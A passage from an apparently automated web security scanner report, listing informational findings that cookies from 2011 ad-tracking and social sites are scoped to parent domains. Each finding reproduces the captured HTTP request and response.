Set-Cookie: C2=WCJBOFJwFob0Fo3sIOwJoaQXtKvBC0nRuIpwGg02F+oBdbdhPawihX4jGwjmG+oBA9qhPaAZhX4jGskmG+oB6ijhPaAmhX4jGAY4F+oBdDmhPaA/ya4jGAVZG+oBYimhPaA3Wa4jGUY4F+oBEHohPaQVrZ4jGEcgG+oB25lhPaglBa4jG0soG+oBecphPagCaa4jGUEoG+oBVGohPaAvZa4jRGAZmjoRp1I9IsfzFA3shdwjkaQLumPAEOphROrZAMKpGG5sQBwSkaYkvChA3hoBWpqbBkWZG/LpeYQt1Y8PwOoBM/oBBdr0GwKvGFEt5bwMvakQcKpA4gohbJwn2a4W; domain=advertising.com; expires=Sun, 23-Jun-2013 13:26:46 GMT; path=/
Set-Cookie: F1=BYJkE4kAAAAABU/CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Sun, 23-Jun-2013 13:26:46 GMT; path=/
Set-Cookie: BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHpGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOIDL!; domain=advertising.com; expires=Sun, 23-Jun-2013 13:26:46 GMT; path=/
Set-Cookie: ROLL=U6APDjemptEWS0P!; domain=advertising.com; expires=Sun, 23-Jun-2013 13:26:46 GMT; path=/
Set-Cookie: 93673890=_4e049096,1512334550,783617^956561^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000783617/mnum=0000956
...[SNIP]...
12.40. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=12577&partnerID=169&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=f034cbc4-3674-4d22-be3a-aac76e8e10cb; uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1308705121+ \"4\": 1305981633}"; partnerUID="eyIxNSI6IFsiMDA0MDAzMDAxNDAwMDAwNDQ5ODcyIiwgdHJ1ZV0sICI4NCI6IFsiRno2K0VTL2M5OU82ejVPQiIsIHRydWVdLCAiMTEzIjogWyJGUVdXQzJWSzJEV0YiLCB0cnVlXX0="; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1308836704+ \"TgNDVQABeU4K7F4GcysJsg==\"+ 63083+ 25140+ 4515]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuG4v5hNgFHiQVvvBxYFRo0XU4C0AaMFmM8lwbFiPitQ9ltTK1j22+spQFkGCwYuEY41/5kEmCSegWUYNBigor0LQKa1nH36Hln09USQ6MGH11FEJ78HmX2hYTOK6Fuw2rNoor8XgtTORRO9+5IFKDrjQwOK6E6gm7MkPr1HFhXlmPmDRaCVWWLRaVThXV9ZBCYySpxb/v8dsvAsoBnXGCWuvPz3Dtnosy9YBZgl9j29hyL68RXYcbsuoIjO2ggSvfX9IEIUABhbZm8="; io_freq_p1="eJzjkuY4mCDAKPGgrfcDiwKjxoOVkz6wGDBagPlcIhzbQgUOMkl8a2oFyjJoMBgwWDBwCXP8sBFgkniGJrgMZE7L2afvkQWXxANVHnx4HUXwcQxQ5YWGzSiCF0KBgnPRBJ8GAAVnfGhAEhTh+BEo0Mosseg0quitQIGJjBLnlv9/h2zA5hgBZol9T++hCB4F2T931wUUwe5woOCt7wcRggDyxkuo"; segments_p1="eJwdkctKAlEcxtGZxeGs5oF6hPb1Cm16hiwkEqeF0SJJw6xNlHlbGJKbxEuD5MLISwmBGkaCQ9AEY9r/+zYfP77zvx9tKrdsaFMlOgHR4wJ4uAC3foOiH3dwJn1wbAydjYLaUDfbgg5D6jSWG4J2HUaR0TVWOV+AT2fg/D04QafmQS9DqP7lg3sSb6imEqkj+uoJb13GPXKuxgjctNEutKm1quYMK5OKe6YYWQwUmyCiZUPjR6jSZI4zBbtzaMWHJl0yFyiuoLvs8cp+J/R/8nA+ffRbrQtGx8DUmuAD87Pc1GG/NjN7beR0bvHqsHfqBTrljgPGVCOIuZA5tNofBaxu6XBuiuP9ISvN++wtwaUM9H0A5znPuXmVhsxqqJxCIIePFvC4I7ZWg7BpvS3CLkoWuWzO5QgV6LjAw9OPlaHfHNPm6WweYXYGvvbxIWlLsO9h8cgW/hlNhwfGP7gfnzo="

Response

HTTP/1.0 302 Found
Server: IM BidManager
Date: Fri, 24 Jun 2011 13:18:31 GMT
Expires: Fri, 24-Jun-2011 13:18:11 GMT
Location: http://ad.yieldmanager.com/pixel?id=754430&t=2
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/plain
Set-Cookie: segments_p1="eJwdkU9LAlEUxWlmFq9ZzQfqI7Svdbs2foZMXCTOpmiRZDFZBFHmP6iQ3CSaiejCKLWEQCeMBhqCDJzG7jmbH2fOPe/eN/eZuoqumobqBQvCvV9NmA40U1fOksijAEaGRl6JLM1hVJir8Ux9BH1PNsgmqy2y19GFQyY9Vv0v6O8RWoZKMF8WJNbFTI4R2Cb3PcQOfPAkiibpLnTeR7VwC95J1VTVvG5lndTUEOenoEuzOoINm3chWzamZSxJD+KG9RrEfaSHW+j7fgNO/3AoFoK2y3u4OJSLCC4i8p3rwy2R11nkqgmctIvgYwGOy+qkopmLylmzTq9yHNScoLjB4CYZ4x6TRY6rc1wZepfV1A5/vg3tPKF6POMiyDP659Qloa4aeJoKjSaXXJvyUdjsgezQ6V4i80zdJwfkC/k2AMdF/sMM/CA/Se+Qz1fGhsOVf+IOnsE="; Domain=invitemedia.com; expires=Sat, 23-Jun-2012 13:18:31 GMT; Path=/

12.41. http://segments.adap.tv/data/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/?p=aoltacoda&type=gif&add=true&segment=99999,51134,56282,57094,60740,56297,57130,57129,53380,60489,60515,52615,57289,52946,53656,55401,50507,50557,54255,53778,51182,54252,50961,54209,56835,55467,56673,57372,56780,56232,57288 HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcodeqt.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1308466800,\"e\":1308466800,\"s\":[],\"a\":[]},\"7\":{\"f\":1308553200,\"e\":1308553200,\"s\":[1740],\"a\":[]},\"31\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1953,1952,1950,1966,1949,1960,1947,1962],\"a\":[]},\"9\":{\"f\":1310540400,\"e\":1310540400,\"s\":[1508],\"a\":[]},\"25\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1996],\"a\":[]},\"8\":{\"f\":1311058800,\"e\":1311058800,\"s\":[1672],\"a\":[]},\"28\":{\"f\":1310886000,\"e\":1339830000,\"s\":[1802],\"a\":[]}}}"; adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-20+05%3A11%3A12"; rtbData0="key=turn:value=4325897289836481830:expiresAt=Mon+Jun+27+05%3A11%3A12+PDT+2011:32-Compatible=true"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
p3p: CP="DEM"
Cache-Control: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-24+07%3A15%3A31";Path=/;Domain=.adap.tv;Expires=Mon, 02-Mar-2043 16:02:11 GMT
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"31\":{\"f\":1311490800,\"e\":1311490800,\"s\":[1953,1952,1950,1966,1949,1960,1947,1962],\"a\":[]},\"9\":{\"f\":1310540400,\"e\":1310540400,\"s\":[1508],\"a\":[]},\"25\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1996],\"a\":[]},\"8\":{\"f\":1311058800,\"e\":1311058800,\"s\":[1672],\"a\":[]},\"28\":{\"f\":1310886000,\"e\":1339830000,\"s\":[1802],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Mon, 02-Mar-2043 16:02:11 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;
12.42. http://tracking.searchmarketing.com/welcome.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=1551&x= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: tracking.searchmarketing.com

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:37:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=8ea16429%2Dc539%2D4f35%2D91f3%2De973263df539&AID=&LastVisitDate=6%2F24%2F2011+10%3A37%3A51+AM&SMCID=1551; expires=Sun, 24-Jul-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDSCTACCDB=MJAIJOECHOHFBBIFPFEFLDPJ; path=/
Cache-control: private

GIF89a...................!.......,...........T..;
12.43. http://www.addthis.com/bookmark.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bookmark.php?v=250&winname=addthis&pub=asepyanm&source=tbx-250,max-250&lng=en&s=hotmail&url=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2Ftelkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html&title=TELKOM%20-%20Telkom%20Meraih%20IMAC%20Award%20sebagai%20The%20Best%20Provider%20and%20Telecommuncation&ate=AT-asepyanm/-/-/4e048e7fb62f9138/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2F&tt=0 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; uid=4dce8a530508b02d; psc=3; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308921511.3N|1308911539.1EY|1308911539.60|1308911539.1FE|1308911539.1WV|1308225884.1VV|1308225884.19F|1306359996.1OD; bt=1308921511|00004N010; dt=X; ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxBAAv8wVi; sshs=facebook; Coyote-2-a0f0083=a0f02a8:0

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:18:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxtM7IL8lNzMzRMQIAekYI6Q%3D%3D; expires=Sun, 23-Jun-2013 13:18:52 GMT; path=/; domain=.addthis.com
Set-Cookie: sshs=hotmail%2Cfacebook; expires=Sun, 23-Jun-2013 13:18:52 GMT; path=/; domain=.addthis.com
Vary: Accept-Encoding
Content-Length: 774
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
<title>contacting Hotmail ...</title>
<meta http-equiv="refresh" content="0;url=http://www.hotmail.msn.com/secure/start?action=compose&to=&subject=TELKOM+-+Telkom+Meraih+
...[SNIP]...
12.44. http://www.facebook.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.addthis.com/bookmark.php?v=250&winname=addthis&pub=asepyanm&source=tbx-250,men-250&lng=en&s=facebook&url=http%3A%2F%2Fbeta.telkom.co.id%2Fproduk-layanan%2F&title=Produk%20dan%20Layanan&ate=AT-asepyanm/-/-/4e048e8a01452adb/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Finfo-perusahaan%2F&tt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Jr-eQ; next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook; next_path=%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; expires=Sun, 23-Jun-2013 13:18:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.140.126
X-Cnection: close
Date: Fri, 24 Jun 2011 13:18:36 GMT
Content-Length: 17051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
12.45. http://www.facebook.com/sharer/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer/sharer.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer/sharer.php?u=http%3A%2F%2Fbeta.telkom.co.id%2Fproduk-layanan%2F%23.TgSOp6MNlm8.facebook HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.addthis.com/bookmark.php?v=250&winname=addthis&pub=asepyanm&source=tbx-250,men-250&lng=en&s=facebook&url=http%3A%2F%2Fbeta.telkom.co.id%2Fproduk-layanan%2F&title=Produk%20dan%20Layanan&ate=AT-asepyanm/-/-/4e048e8a01452adb/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Finfo-perusahaan%2F&tt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Jr-eQ

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.214.39
X-Cnection: close
Date: Fri, 24 Jun 2011 13:18:34 GMT
Content-Length: 0

12.46. http://www.xobni.com/csscache/1306529290/styles/chalupa.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /csscache/1306529290/styles/chalupa.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /csscache/1306529290/styles/chalupa.css?lang=en HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6dd8e17077a4823699b058fb133c8d6; trigger_id=11955508; NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:37 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.7 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Cache-Control: public, maxage=31536000
Expires: Sat, 23 Jun 2012 17:04:37 GMT
Last-Modified: Fri, 27 May 2011 20:48:10 GMT
Vary: Accept-Encoding
Content-Length: 46980
Content-Type: text/css
Set-Cookie: NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660;expires=Fri, 24-Jun-2011 23:04:37 GMT;path=/;domain=xobni.com;httponly

/* START 2011 REDESIGN */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fi
...[SNIP]...
12.47. http://www.xobni.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6dd8e17077a4823699b058fb133c8d6; trigger_id=11955508; __utmz=56318370.1308935080.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660; __utma=56318370.1312701461.1308935080.1308935080.1308935080.1; __utmc=56318370; __utmb=56318370.2.9.1308935086025

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:47 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.7 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
Last-Modified: Tue, 14 Sep 2010 16:48:04 GMT
ETag: "626a7f-47e-4903afa055900"
Accept-Ranges: bytes
Content-Length: 1150
Age: 16354
Content-Type: image/x-icon
Set-Cookie: NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660;expires=Fri, 24-Jun-2011 23:04:47 GMT;path=/;domain=xobni.com;httponly

............ .h.......(....... ..... ..........................E...F..K...K...K...K...K...K...K...K...K...K...K...K...F..E...G..[/..\1..\1..\1..\1..\1..\1..\1..\1..{X..f>..\1..\1..[/..G..L...^4..^
...[SNIP]...
12.48. http://www.xobni.com/javascripts/jquery.base64.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /javascripts/jquery.base64.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascripts/jquery.base64.min.js HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6dd8e17077a4823699b058fb133c8d6; trigger_id=11955508; NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.7 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
Last-Modified: Fri, 15 Apr 2011 00:00:05 GMT
ETag: "19c007-12cfb-4a0e9b963eb40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 77051
Content-Type: application/javascript
Set-Cookie: NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660;expires=Fri, 24-Jun-2011 23:04:36 GMT;path=/;domain=xobni.com;httponly

/*
@desc
   Base64 encoder and decoder write by JavaScript. This code was a plugin of
   jQeury, you must load jQuery library first if you want to use this code.
    - After encode, you can decode it with
...[SNIP]...
12.49. http://www.xobni.com/javascripts/jquery.json-2.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /javascripts/jquery.json-2.2.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascripts/jquery.json-2.2.min.js HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6dd8e17077a4823699b058fb133c8d6; trigger_id=11955508; NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.7 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
Last-Modified: Wed, 12 Jan 2011 21:46:27 GMT
